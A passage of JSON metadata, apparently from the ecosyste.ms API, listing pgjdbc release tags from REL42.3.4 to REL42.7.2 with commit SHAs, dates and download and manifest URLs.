ag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2/manifests"},{"name":"REL42.7.1","sha":"27bbccfeb73eec105057e53ae6068faf0e6f40b2","kind":"tag","published_at":"2023-12-06T15:32:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.1/manifests"},{"name":"REL42.7.1-rc2","sha":"27bbccfeb73eec105057e53ae6068faf0e6f40b2","kind":"tag","published_at":"2023-12-06T15:26:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.1-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.1-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.1-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.1-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.1-rc2/manifests"},{"name":"REL42.7.1-rc1","sha":"bb577e0a7afb0df74a9a00d43896ada2c1dd0dfc","kind":"tag","published_at":"2023-12-06T15:08:37.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.1-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.1-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.1-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.1-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.1-rc1/manifests"},{"name":"REL42.7.0","sha":"1566eed0caeb26108f9df1d28255538767b7676f","kind":"tag","published_at":"2023-11-20T19:04:47.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.0/manifests"},{"name":"REL42.7.0-rc3","sha":"1566eed0caeb26108f9df1d28255538767b7676f","kind":"tag","published_at":"2023-11-20T18:11:04.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.0-rc3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.0-rc3/manifests"},{"name":"REL42.6.0","sha":"d6a0cc2babc5e5a4cef0a8eafd1b36198d8e3873","kind":"tag","published_at":"2023-03-17T22:10:29.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.6.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.0/manifests"},{"name":"REL42.6.0-rc1","sha":"d6a0cc2babc5e5a4cef0a8eafd1b36198d8e3873","kind":"tag","published_at":"2023-03-17T22:07:45.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.6.0-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.6.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.6.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.0-rc1/manifests"},{"name":"REL42.5.4","sha":"051ae1b75a08a695ce1f96bcea7ce7ca49f798c9","kind":"tag","published_at":"2023-02-16T14:41:18.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.4/manifests"},{"name":"REL42.5.4-rc1","sha":"051ae1b75a08a695ce1f96bcea7ce7ca49f798c9","kind":"tag","published_at":"2023-02-16T14:26:33.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.4-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.4-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.4-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.4-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.4-rc1/manifests"},{"name":"REL42.5.3","sha":"976b27b5efce6486cc9d6330561184e875dbde53","kind":"tag","published_at":"2023-02-03T15:23:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.3/manifests"},{"name":"REL42.5.3-rc2","sha":"976b27b5efce6486cc9d6330561184e875dbde53","kind":"tag","published_at":"2023-02-03T15:19:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.3-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.3-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.3-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.3-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.3-rc2/manifests"},{"name":"REL42.5.3-rc1","sha":"d2f77a26815e7994db7ac4d816d29d6d7395418d","kind":"tag","published_at":"2023-02-03T15:07:22.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.3-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.3-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.3-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.3-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.3-rc1/manifests"},{"name":"REL42.5.2-rc2","sha":"50dc6bc28f3da47d392d824887e92e51012f7fbc","kind":"tag","published_at":"2023-02-01T13:20:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.2-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.2-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.2-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.2-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.2-rc2/manifests"},{"name":"REL42.5.2","sha":"50dc6bc28f3da47d392d824887e92e51012f7fbc","kind":"commit","published_at":"2023-01-31T20:40:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.2/manifests"},{"name":"REL42.5.2-rc1","sha":"e7239c1f8e1f8757fbe3b50ba4c967ea85cdf12e","kind":"tag","published_at":"2023-01-13T20:43:25.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.2-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.2-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.2-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.2-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.2-rc1/manifests"},{"name":"REL42.5.1","sha":"9008dc9aade6dbfe4efafcd6872ebc55f4699cf5","kind":"tag","published_at":"2022-11-23T14:36:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.1/manifests"},{"name":"REL42.5.1-rc1","sha":"9008dc9aade6dbfe4efafcd6872ebc55f4699cf5","kind":"tag","published_at":"2022-11-23T14:32:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.1-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.1-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.1-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.1-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.1-rc1/manifests"},{"name":"REL42.4.3","sha":"34855cffb9079edf95cf77930f3e3b73f6a1b139","kind":"tag","published_at":"2022-11-23T14:02:53.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.3/manifests"},{"name":"REL42.4.3-rc1","sha":"34855cffb9079edf95cf77930f3e3b73f6a1b139","kind":"tag","published_at":"2022-11-23T13:58:08.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.3-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.3-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.3-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.3-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.3-rc1/manifests"},{"name":"REL42.3.8","sha":"e73c6b6b53ff11bc0bd06c44130a880d3bf77c55","kind":"tag","published_at":"2022-11-23T13:47:42.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.8","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.8/manifests"},{"name":"REL42.3.8-rc1","sha":"e73c6b6b53ff11bc0bd06c44130a880d3bf77c55","kind":"tag","published_at":"2022-11-23T13:37:54.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.8-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.8-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.8-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.8-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.8-rc1/manifests"},{"name":"REL42.2.27","sha":"91b8c2ca600f82d2ec47c3fb54ca2036b000e320","kind":"tag","published_at":"2022-11-23T13:33:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.27","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.27/manifests"},{"name":"REL42.2.27-rc1","sha":"91b8c2ca600f82d2ec47c3fb54ca2036b000e320","kind":"tag","published_at":"2022-11-23T13:30:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.27-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.27-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.27-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.27-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.27-rc1/manifests"},{"name":"REL42.3.7","sha":"0afaa71d5254804f8bab7caab96735c5f7d11aa1","kind":"tag","published_at":"2022-09-06T12:53:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.7","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.7/manifests"},{"name":"REL42.3.7-rc1","sha":"0afaa71d5254804f8bab7caab96735c5f7d11aa1","kind":"tag","published_at":"2022-09-06T12:43:18.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.7-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.7-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.7-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.7-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.7-rc1/manifests"},{"name":"REL42.5.0","sha":"f490edf94bddc103c291b9429f8a63275d64e4ea","kind":"tag","published_at":"2022-08-24T17:25:13.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.0/manifests"},{"name":"REL42.5.0-rc1","sha":"f490edf94bddc103c291b9429f8a63275d64e4ea","kind":"tag","published_at":"2022-08-24T17:11:15.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.0-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.0-rc1/manifests"},{"name":"REL42.4.2","sha":"389be0a6e61c42bf65bb2974f5f1664bf7d8db8c","kind":"tag","published_at":"2022-08-17T15:39:01.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.2/manifests"},{"name":"REL42.4.2-rc1","sha":"389be0a6e61c42bf65bb2974f5f1664bf7d8db8c","kind":"tag","published_at":"2022-08-17T15:22:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.2-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.2-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.2-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.2-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.2-rc1/manifests"},{"name":"REL42.2.26","sha":"b5ee575b7d6e0918a58fe533f6c50b0c7e9f73c0","kind":"tag","published_at":"2022-08-03T13:21:52.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.26","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.26/manifests"},{"name":"REL42.2.26-rc2","sha":"b5ee575b7d6e0918a58fe533f6c50b0c7e9f73c0","kind":"tag","published_at":"2022-08-03T13:20:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.26-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.26-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.26-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.26-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.26-rc2/manifests"},{"name":"REL42.2.26-rc1","sha":"b5ee575b7d6e0918a58fe533f6c50b0c7e9f73c0","kind":"tag","published_at":"2022-08-03T13:16:54.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.26-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.26-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.26-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.26-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.26-rc1/manifests"},{"name":"REL42.4.1","sha":"bd91c4cc76cdfc1ffd0322be80c85ddfe08a38c2","kind":"tag","published_at":"2022-08-03T13:14:28.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.1/manifests"},{"name":"REL42.4.1-rc1","sha":"bd91c4cc76cdfc1ffd0322be80c85ddfe08a38c2","kind":"tag","published_at":"2022-08-03T12:58:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.1-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.1-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.1-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.1-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.1-rc1/manifests"},{"name":"REL42.4.0","sha":"09166bdf724b9a869520a75bfd44716b7af8db2d","kind":"tag","published_at":"2022-06-09T15:58:25.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.0/manifests"},{"name":"REL42.4.0-rc1","sha":"09166bdf724b9a869520a75bfd44716b7af8db2d","kind":"tag","published_at":"2022-06-09T14:55:40.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.0-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.0-rc1/manifests"},{"name":"REL42.3.6","sha":"7714d035b2123bbf5e5461d3ea162af946191941","kind":"tag","published_at":"2022-05-24T13:19:37.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.6","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.6/manifests"},{"name":"REL42.3.6-rc1","sha":"7714d035b2123bbf5e5461d3ea162af946191941","kind":"tag","published_at":"2022-05-24T13:11:31.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.6-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.6-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.6-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.6-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.6-rc1/manifests"},{"name":"REL42.3.5","sha":"0d6ccb194a94cebe1cc0add461382b91f13c2a4a","kind":"tag","published_at":"2022-05-04T15:41:59.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.5/manifests"},{"name":"REL42.3.5-rc1","sha":"0d6ccb194a94cebe1cc0add461382b91f13c2a4a","kind":"tag","published_at":"2022-05-04T14:50:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.5-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.5-rc1/manifests"},{"name":"REL42.3.4","sha":"b4a9346c1b0089c04eb448224ab8fbfcae586450","kind":"tag","published_at":"2022-04-15T18:48:35.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.